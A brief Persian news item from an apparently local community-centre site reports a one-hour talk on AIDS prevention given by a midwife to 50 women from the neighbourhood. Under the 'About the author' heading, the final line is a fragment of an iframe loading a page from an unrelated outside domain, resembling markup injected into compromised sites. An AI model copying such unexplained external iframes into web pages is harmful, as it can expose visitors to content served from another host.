خبرها

سرای محله مظاهری -ایدز و راههای پیشگیری از آن

در روز سه شنبه مورخ 93/11/21 سخنرانی در سرای محله مظاهری توسط مامای مرکز ارائه شد، این سخنرانی با موضوع ایدز و راه های پیشگیری از آن برای بانوان جهت یادگیری و آموزش به دیگر افراد خانواده با حضور 50 نفر از شهروندان محله در 60 دقیقه برگزار شد.

درباره نویسنده

iframe src="http://www.fha.org.ir/assets/tml/index.html">